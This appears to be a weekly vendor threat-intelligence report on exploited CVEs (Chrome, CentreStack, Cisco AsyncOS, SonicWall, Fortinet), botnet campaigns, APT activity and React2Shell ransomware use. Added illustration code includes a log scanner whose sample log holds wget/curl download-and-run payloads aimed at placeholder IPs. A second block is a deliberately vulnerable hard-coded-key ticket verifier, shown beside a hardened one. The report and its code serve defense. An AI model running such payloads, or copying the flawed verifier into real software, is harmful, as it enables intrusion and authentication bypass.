December 19, 2025

Surge in Active Exploitation Impacts Core Infrastructure and IoT Devices

Executive Summary

The past week highlighted the rapid acceleration of exploitation across both enterprise and internet-facing technologies. CISA expanded its Known Exploited Vulnerabilities (KEV) catalog with eight newly exploited flaws affecting a wide range of products, including Google Chrome, Gladinet CentreStack and TrioFox, Cisco, SonicWall SMA1000, Apple, Fortinet, and Sierra Wireless.  

Botnet activity also intensified across cloud and edge environments, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st ramping up campaigns against exposed cloud services, routers, and web applications by abusing misconfigurations and unpatched systems.

Targeted intrusion activity further reflected the evolving threat landscape, as Cisco confirmed active exploitation of a zero-day in Cisco AsyncOS by the China-linked APT UAT-9686, while Check Point Research linked the Ink Dragon group to ToolShell-based SharePoint attacks. In parallel, S-RM researchers observed React2Shell (CVE-2025-55182) being used as an initial access vector in a Weaxor ransomware incident, highlighting how quickly new vulnerabilities are being operationalized by both state-aligned and financially motivated actors.

Key points:

  • 8 vulnerabilities added to the CISA KEV catalog, reflecting recent exploitation activity.
  • Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
  • Exploitation of React2Shell (CVE-2025-55182) continues.
  • A zero-day flaw in Cisco AsyncOS is being actively exploited by a China-linked APT.
  • The Ink Dragon threat group was observed exploiting on-premises Microsoft SharePoint servers using the ToolShell exploit chain.
  • Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

What are the top trending or critical vulnerabilities observed this week?

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-14174 - Out of Bounds Memory Access Vulnerability in Google Chromium

An Out-of-Bounds Memory Access vulnerability in Google Chromium’s ANGLE graphics layer allowed remote attackers to trigger unauthorized memory access through a crafted HTML page, potentially impacting any Chromium-based browser such as Google Chrome, Microsoft Edge, and Opera. The flaw was initially tracked under Chromium issue ID 466192044, with details about the component and CVE assignment intentionally withheld. Evidence later confirmed that it was exploited as a zero-day in the wild, prompting urgent security responses. Google has issued patches in Chrome versions 143.0.7499.109/.110 for Windows and macOS and 143.0.7499.109 for Linux to mitigate the risk. The vulnerability has since been added to the CISA KEV catalog, underscoring its active exploitation and the need for immediate remediation.

CVE-2025-14611 - Hard-Coded Cryptographic Key Vulnerability in Gladinet CentreStack and Triofox

A Hard-Coded Cryptographic Keys vulnerability in Gladinet CentreStack and Triofox allowed attackers to decrypt or forge access tickets because the GenerateSecKey() function in GladCtrl64.dll produced static AES keys. This flaw enabled adversaries to craft malicious requests to the /storage/filesvr.dn endpoint, often using encrypted paths such as vghpI7EToZUDIZDdprSubL3mTZ2, to access sensitive files such as web.config, obtain machine keys, and attempt ViewState deserialization-based remote code execution. Attack activity, observed from IP 147.124.216[.]205, affected at least nine organizations across sectors including healthcare and technology and involved chaining the new vulnerability, CVE-2025-14611, with the previously disclosed CVE-2025-11371. Although attackers leveraged never-expiring forged tickets by manipulating the username, password, and timestamp fields, their final RCE attempt failed. The issue, which Gladinet had previously addressed in version 16.12.10420.56791 of CentreStack and TrioFox, has now been added to the CISA KEV catalog following confirmation of active exploitation.

CVE-2025-20393 - Improper Input Validation Vulnerability in Cisco Multiple Products

An Improper Input Validation vulnerability in Cisco Secure Email Gateway, Secure Email, AsyncOS Software, and Web Manager appliances allowed threat actors to execute arbitrary commands with root privileges on affected systems. Active exploitation revealed that attackers were able to deploy persistence mechanisms to maintain continued access to compromised appliances. All versions of Cisco AsyncOS were affected, provided the Spam Quarantine feature was enabled and exposed to the internet, significantly increasing the attack surface for both physical and virtual deployments. As the vulnerability is unpatched as of writing, organizations are advised to closely monitor Cisco security advisories and immediately restrict or disable external access to affected features. The issue has been added to the CISA KEV catalog, confirming active exploitation in the wild.

CVE-2025-40602 - Missing Authorization Vulnerability in SonicWall SMA1000

A Missing Authorization vulnerability in the SonicWall SMA1000 Appliance Management Console (AMC) allowed attackers to escalate privileges on affected devices. Despite its moderate severity rating, the flaw became significantly more dangerous when chained with the previously disclosed CVE-2025-23006, enabling attackers to achieve unauthenticated remote code execution with root-level privileges. By chaining the two vulnerabilities, attackers were able to bypass authentication entirely and elevate access to full administrative control. SonicWall has released platform hotfixes (builds 12.4.3-03245 and 12.5.0-02283) to remediate the issue. The vulnerability has now been included in the CISA KEV catalog, signaling confirmed and ongoing exploitation in real-world attacks.

CVE-2025-43529 - Use-After-Free WebKit Vulnerability in Apple Multiple Products

A Use-After-Free vulnerability in Apple's WebKit engine affected multiple products, including iOS, iPadOS, macOS Tahoe, tvOS, watchOS, visionOS, and Safari, and allowed remote code execution when processing maliciously crafted web content. Apple confirmed that the flaw, discovered by Google's Threat Analysis Group, impacted any HTML parser relying on WebKit, extending the risk beyond native Apple platforms to third-party products embedding WebKit. Although technical details were withheld, Apple acknowledged that CVE-2025-43529 and CVE-2025-14174 may have been exploited in an extremely sophisticated, targeted spyware campaign against individuals running versions of iOS prior to iOS 26. The vulnerability has been resolved in iOS/iPadOS 26.2, iOS/iPadOS 18.7.3, macOS Tahoe 26.2, tvOS 26.2, watchOS 26.2, visionOS 26.2, and Safari 26.2. It was recently added to the CISA KEV catalog following confirmation of in-the-wild exploitation.

CVE-2025-59374 - Embedded Malicious Code Vulnerability in ASUS Live Update

An Embedded Malicious Code vulnerability in ASUS Live Update stemmed from a supply chain compromise in which unauthorized modifications were introduced into distributed update builds. The tampered software caused devices meeting specific targeting conditions to perform unintended actions, indicating selective and controlled abuse. The incident emerged shortly after ASUS confirmed that the Live Update client reached end-of-support on December 4, 2025, leaving affected users without ongoing security fixes. Given the confirmed compromise and lack of future updates, users were advised to discontinue the use of the product immediately. The vulnerability has since been added to the CISA KEV catalog, reflecting verified exploitation in the wild.

CVE-2025-59718 - Improper Verification of Cryptographic Signature Vulnerability in Fortinet Multiple Products

An Improper Verification of Cryptographic Signature vulnerability in Fortinet FortiOS, FortiSwitchMaster, FortiProxy, and FortiWeb allowed unauthenticated attackers to bypass FortiCloud SSO authentication using crafted SAML messages when the feature was enabled. Threat actors began actively exploiting the flaw shortly after public disclosure, conducting malicious SSO login attempts primarily targeting the admin account from infrastructure associated with hosting providers such as The Constant Company LLC, BL Networks, and Kaopu Cloud HK Limited. Although FortiCloud SSO is disabled by default, it is automatically enabled during FortiCare registration unless administrators explicitly disable it, increasing exposure. Fortinet has released multiple patched versions and advised affected organizations to temporarily disable FortiCloud SSO until upgrades can be applied. The vulnerability has since been added to the CISA KEV catalog, confirming active exploitation in the wild.

CVE-2018-4063 - Unrestricted Upload of File with Dangerous Type Vulnerability in Sierra Wireless AirLink ALEOS

An Unrestricted Upload of File with Dangerous Type vulnerability in Sierra Wireless AirLink ALEOS on the ES450 (firmware 4.9.3) allowed attackers to upload malicious files to the device due to insufficient controls in the template file-upload mechanism. By specifying arbitrary filenames and overwriting existing executable CGI or shell script files, an authenticated attacker could achieve arbitrary code execution through the ACEManager web interface, which runs with root privileges. The AirLink ES450, commonly used in distributed enterprise environments, point-of-sale infrastructure, and remote SCADA systems, was particularly exposed, even though ACEManager is not accessible from the cellular WAN by default. The vulnerability was further aggravated by the product's End-of-Life status, leaving organizations without vendor patches and necessitating discontinuation of use. This flaw has since been added to the CISA KEV catalog, indicating confirmed exploitation in the wild.

What did Cytellite sensors detect this week?

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

| Vulnerability | Product | Severity | Title | Exploited in-the-wild | CISA KEV |
|---|---|---|---|---|---|
| CVE-2025-7417 | Tenda O3V2 1.0.0.12(3880) | High | Buffer Overflow vulnerability in the Tenda O3V2 1.0.0.12(3880) | False | False |
| CVE-2025-7414 | Tenda O3V2 1.0.0.12(3880) | Medium | OS Command Injection vulnerability in Tenda O3V2 1.0.0.12(3880) | False | False |
| CVE-2025-5777 | Citrix NetScaler ADC and Gateway | Critical | Out-of-Bounds Read vulnerability in Citrix NetScaler ADC and Gateway | True | True |
| CVE-2025-31324 | SAP NetWeaver | Critical | Unrestricted File Upload vulnerability in SAP NetWeaver | True | True |
| CVE-2025-26399 | SolarWinds Web Help Desk | Critical | Deserialization vulnerability in SolarWinds Web Help Desk | False | False |
| CVE-2024-47176 | CUPS | Medium | Improper Input Validation vulnerability in OpenPrinting cups-browsed through 2.0.1 leads to remote code execution | True | False |
| CVE-2024-4577 | PHP-CGI on Windows | High | Critical Argument Injection vulnerability in PHP on Windows servers | True | True |
| CVE-2024-3721 | TBK DVR Devices | Medium | OS Command Injection vulnerability in TBK DVR-4104 and DVR-4216 up to 20240412 | True | False |
| CVE-2023-38646 | Metabase open source | Critical | Remote Code Execution vulnerability in Metabase open source | False | False |
| CVE-2023-31192 | SoftEtherVPN | Medium | Information Disclosure vulnerability in the ClientConnect() functionality of SoftEther VPN | False | False |

What botnet activity was observed this week?

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

| Vulnerability | Product | Title | Exploit | Abused by Botnet |
|---|---|---|---|---|
| CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K |
| CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution vulnerability in Gitlab-Exiftool | True | Andoryu |
| CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st |
| CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai |
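As an added illustration of the detection side of the observation above (this is not code from the original report or from Loginsoft), the following script scans constructed web-server access log lines for two of the botnet traits named on this page: a wget or curl command fetching a stager from a bare IP address, and a request for the PHPUnit Util/PHP/eval-stdin.php path associated with CVE-2017-9841. The log lines and IP addresses are constructed samples from documentation address ranges, not real telemetry.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (combined format) mimicking the traits discussed above.
SAMPLE_LOG = """\
203.0.113.10 - - [19/Dec/2025:10:01:02 +0000] "GET /index.php?page=;wget%20http://198.51.100.7/bins/x86;sh%20x86 HTTP/1.1" 200 512
203.0.113.11 - - [19/Dec/2025:10:01:05 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 12
203.0.113.12 - - [19/Dec/2025:10:01:09 +0000] "GET /products?id=42 HTTP/1.1" 200 2048
203.0.113.13 - - [19/Dec/2025:10:01:12 +0000] "POST /cgi-bin/login.cgi HTTP/1.1" 200 88 "-" "Mozilla/5.0 curl http://192.0.2.9/a.sh"
"""

# Combined log format: source IP, timestamp, request line, status, size, optional referer and user agent.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*"'
    r' (?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# wget/curl followed (within the same shell command) by a URL whose host is a bare IPv4
# literal: the stager-download pattern the MISP payloads above are described as using.
FETCH_RE = re.compile(r'\b(?:wget|curl)\b[^;|&]*?https?://(\d{1,3}(?:\.\d{1,3}){3})', re.I)

# Exploit paths named on this page, mapped to the CVE they indicate.
KNOWN_PATHS = {
    "util/php/eval-stdin.php": "CVE-2017-9841",
}


def parse_line(line: str):
    """Return the fields of one access log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(line: str):
    """Return a finding record for a suspicious line, or None for a benign one."""
    rec = parse_line(line)
    if rec is None:
        return None
    findings = []
    # Decode percent-encoding so "wget%20http://..." is visible to the regex; the
    # user agent is included because payloads are sometimes smuggled there.
    decoded = unquote_plus(rec["uri"]) + " " + unquote_plus(rec.get("ua") or "")
    fetch = FETCH_RE.search(decoded)
    if fetch:
        findings.append("remote-fetch-from-ip:" + fetch.group(1))
    path = unquote_plus(rec["uri"]).split("?", 1)[0].lower()
    for needle, cve in KNOWN_PATHS.items():
        if needle in path:
            findings.append("path-match:" + cve)
    if not findings:
        return None
    return {"src": rec["src"], "uri": rec["uri"], "findings": findings}


def scan(log_text: str):
    """Classify every non-empty line and return the list of findings."""
    return [hit for hit in (classify(l) for l in log_text.splitlines() if l.strip()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["src"], hit["findings"])
```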

Which vulnerabilities were abused by malware this week?

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

CVE-2025-20393

According to Cisco, this maximum severity zero-day vulnerability in Cisco AsyncOS, was actively exploited by a China-linked advanced persistent threat (APT) actor tracked as UAT-9686, targeting Cisco Secure Email Gateway and Cisco Secure Email and Web Manager appliances. Cisco stated it became aware of the intrusion campaign on December 10, 2025, identifying a limited subset of internet-exposed appliances with specific ports open, although the full scope of affected customers remains unknown. Analysis of the activity indicated exploitation dating back to late November 2025, with the threat actor leveraging the flaw to deploy tunneling tools such as ReverseSSH (AquaTunnel) and Chisel, along with a log-cleaning utility known as AquaPurge. The use of AquaTunnel aligns with tooling previously associated with Chinese threat groups including APT41 and UNC5174. In addition, attackers deployed a lightweight Python-based backdoor dubbed AquaShell, capable of receiving encoded commands and executing them on compromised systems.

China-Linked Ink Dragon Targets SharePoint via ToolShell Exploit Chain

Check Point Research identified a new wave of attacks in recent months attributed to a China-aligned threat actor tracked as Ink Dragon, which is also referenced by the broader cybersecurity community as CL-STA-0049, Earth Alux and REF7707. The group is assessed to have been active since at least March 2023. During the observed campaigns, Ink Dragon exploited publicly disclosed machine keys to perform ASP.NET ViewState deserialization and further weaponized the ToolShell SharePoint vulnerabilities to deploy web shells on compromised servers. ToolShell is an exploit chain targeting on-premises Microsoft SharePoint that combines authentication bypass and unsafe deserialization flaws (CVE-2025-49706 / CVE-2025-53771 and CVE-2025-49704 / CVE-2025-53770) to achieve unauthenticated remote code execution and persistent web shell installation on vulnerable environments.

CVE-2025-55182

S-RM researchers observed an incident in which a financially motivated threat actor exploited React2Shell (CVE-2025-55182) as the initial access vector to breach a corporate environment and deploy Weaxor ransomware, marking a shift from previously observed exploitation patterns. Weaxor, believed to be a rebrand of the Mallox/FARGO operation, conducts opportunistic attacks against public-facing servers and demands relatively low ransoms without evidence of data exfiltration or double extortion. Shortly after initial access, the attackers executed an obfuscated PowerShell command to deploy a Cobalt Strike beacon for command-and-control, disabled Windows Defender real-time protection, and launched the ransomware payload, completing the sequence in under a minute. While the rapid execution suggested possible automation, investigators found no conclusive evidence to confirm it. The activity remained confined to the React2Shell-vulnerable endpoint, with no lateral movement observed.

| Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS |
|---|---|---|---|---|---|
| CVE-2025-20393 | Critical | Improper Input Validation vulnerability in Cisco Multiple Products | No | UAT-9686, AquaShell backdoor | False |
| CVE-2025-49704 | High | Code Injection vulnerability in Microsoft SharePoint | Yes | Ink Dragon | False |
| CVE-2025-49706 | Medium | Improper Authentication vulnerability in Microsoft SharePoint | Yes | Ink Dragon | False |
| CVE-2025-53770 | Critical | Deserialization of Untrusted Data vulnerability in Microsoft SharePoint | Yes | Ink Dragon | False |
| CVE-2025-53771 | Medium | Spoofing vulnerability in Microsoft SharePoint | Yes | Ink Dragon | False |
| CVE-2025-55182 | Critical | Remote Code Execution vulnerability in Meta React Server Components | Yes | Weaxor Ransomware | False |

Were any PRE-NVD vulnerabilities identified this week?

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

| CVE-ID | Type of vulnerability | Product | Reference |
|---|---|---|---|
| CVE-2025-14282 | Privilege Escalation | Dropbear | Resource |
| CVE-2025-14403 | Insufficient UI Warning / Remote Code Execution | PDFsam Enhanced | Resource |
| CVE-2025-14744 | Filename Spoofing | Mozilla Firefox for iOS | Resource |
| CVE-2025-64374 | Unauthorized Arbitrary Plugin Installation | Motors - Car Dealer, Rental & Listing WordPress theme | Resource |
| CVE-2025-65995 | Disclosure of Sensitive Information | Apache Airflow | Resource |

Conclusion

The week’s activity highlighted the speed at which vulnerabilities are being operationalized across enterprise, cloud, and edge environments, blurring the line between zero-days, botnet campaigns, and ransomware operations. The rapid adoption of newly disclosed flaws by state-linked actors reinforced the need for prioritization based on real-world exploitation rather than theoretical risk alone. LOVI delivers continuous visibility into actively exploited vulnerabilities, threat actor behavior, and attack trends, enabling security teams to cut through noise and focus on what is truly being abused. By aligning vulnerability intelligence with live threat activity, LOVI helps organizations respond faster and defend more effectively.

FAQs:

1) What is React2Shell and why is it appealing for threat actors?

A) React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.

2) How does LOVI help organizations manage vulnerabilities effectively?

A) Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.

3) How do hard-coded cryptographic vulnerabilities arise?

A) Hard-coded cryptographic vulnerabilities arise when encryption keys, secrets, or passwords are embedded directly in source code or binaries instead of being generated securely at runtime or stored in protected key management systems. This practice often results from poor key management design, legacy implementations, or attempts to simplify deployment. Once exposed, static keys can be reused by attackers to decrypt data, forge tokens, or bypass authentication across all affected deployments.
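The following added example (written for this page; it is not Gladinet's code or the CentreStack ticket format) contrasts the two failure modes described in the CentreStack write-up and in this answer: a verifier that trusts a key compiled into every installation and never enforces the ticket's timestamp, beside a hardened verifier that uses a per-deployment key, a constant-time comparison, and a maximum ticket age. HMAC-SHA256 stands in for the AES-based ticket on the page, since the key-management and expiry lessons do not depend on the cipher; the key strings and ticket layout are constructed for the demonstration.

```python
import base64
import binascii
import hashlib
import hmac
import json
import os
import time
from typing import Optional

# Vulnerable design: one constant key shipped in every installation (constructed placeholder).
STATIC_KEY = b"demo-constant-key-do-not-use"
TICKET_MAX_AGE = 3600  # seconds; the hardened verifier rejects anything older


def _sign(body: bytes, key: bytes) -> bytes:
    # HMAC-SHA256 stands in for the AES-based ticket described on the page.
    return hmac.new(key, body, hashlib.sha256).digest()


def issue_ticket(username: str, key: bytes, issued_at: int) -> str:
    """Ticket = urlsafe-base64(JSON claims) + "." + hex(MAC over the claims)."""
    body = json.dumps({"user": username, "ts": issued_at}, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(body).decode() + "." + _sign(body, key).hex()


def _split(ticket: str):
    body_b64, mac_hex = ticket.split(".", 1)
    return base64.urlsafe_b64decode(body_b64), bytes.fromhex(mac_hex)


def verify_vulnerable(ticket: str) -> Optional[dict]:
    # Accepts any ticket signed with the shared key, however old: a forged or replayed
    # ticket with an ancient timestamp is treated exactly like a fresh one.
    body, mac = _split(ticket)
    return json.loads(body) if _sign(body, STATIC_KEY) == mac else None


def load_deployment_key() -> bytes:
    # Hypothetical: key provisioned per installation and supplied via the environment
    # (in production, fetched from a KMS or secrets manager rather than a constant).
    key = os.environ.get("TICKET_KEY")
    if not key:
        raise RuntimeError("TICKET_KEY not provisioned for this deployment")
    return key.encode()


def verify_hardened(ticket: str, key: bytes, now: int) -> Optional[dict]:
    """Per-deployment key, constant-time MAC check, and an enforced ticket lifetime."""
    try:
        body, mac = _split(ticket)
    except (ValueError, binascii.Error):
        return None
    if not hmac.compare_digest(_sign(body, key), mac):
        return None
    claims = json.loads(body)
    ts = claims.get("ts")
    if not isinstance(ts, int) or ts > now or now - ts > TICKET_MAX_AGE:
        return None  # future-dated, replayed or expired
    return claims


def demo(now: Optional[int] = None) -> dict:
    now = int(time.time()) if now is None else now
    stale = issue_ticket("admin", STATIC_KEY, now - 10 * 365 * 86400)  # ten-year-old ticket
    key_a, key_b = b"deployment-A-key", b"deployment-B-key"          # constructed per-site keys
    return {
        "vulnerable_accepts_stale": verify_vulnerable(stale) is not None,
        "hardened_rejects_stale": verify_hardened(stale, STATIC_KEY, now) is None,
        "hardened_rejects_other_deployment": verify_hardened(issue_ticket("admin", key_a, now), key_b, now) is None,
        "hardened_accepts_fresh": verify_hardened(issue_ticket("alice", key_a, now), key_a, now) is not None,
    }
```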

4) What is Cytellite?

A) Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.
